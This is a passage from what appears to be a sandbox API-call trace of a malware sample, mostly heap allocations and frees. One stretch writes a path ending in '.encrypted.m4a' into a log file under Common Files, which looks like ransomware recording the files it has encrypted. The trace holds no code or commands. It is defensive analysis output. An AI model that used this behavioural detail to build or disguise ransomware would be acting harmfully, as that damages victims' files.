hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.728] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.729] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x180) returned 0x7c50e0 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.730] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.731] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xa01, lpOverlapped=0x0) returned 1 [0031.731] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xa01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.731] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.encrypted.m4a\r\n", cchWideChar=101, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0031.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x65) returned 0x7c10a8 [0031.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.encrypted.m4a\r\n", cchWideChar=101, lpMultiByteStr=0x7c10a8, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 101 [0031.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0031.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0031.733] WriteFile (in: hFile=0x128, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x64, lpOverlapped=0x0) returned 1 [0031.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0031.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.733] CloseHandle (hObject=0x128) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.734] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.734] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.736] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.736] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.736] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.736] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.736] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.738] HeapFree 